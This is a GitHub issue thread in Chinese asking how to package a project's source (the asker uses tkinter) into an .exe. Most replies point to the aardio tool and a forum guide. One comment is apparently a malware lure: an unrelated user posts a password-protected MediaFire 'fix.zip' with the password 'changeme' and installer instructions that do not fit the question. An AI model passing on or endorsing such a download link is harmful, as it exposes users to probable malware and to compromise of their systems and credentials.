### ISSUE TITLE
怎么把你的源码编程exe文件

### ISSUE THREAD

**Issue by 123432332** [monthlyliaoyuan/Unofficial_Z_Access#9]

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by louiesun** [comment]
装[aardio](https://aardio.com)

**Comment by louiesun** [comment]
> 

你都会写代码了干嘛不自己写一个批处理。

**Comment by louiesun** [comment]
> 装[aardio](https://aardio.com)

解压7z，打开aardio.exe。然后打开项目里default.aarprj

**Comment by 123432332** [comment]
谢谢，学习无门

**Comment by 123432332** [comment]
我不懂，我用的tkinter

**Comment by louiesun** [comment]
> 谢谢，学习无门

https://bbs.aardio.com/forum.php?mod=viewthread&tid=8663
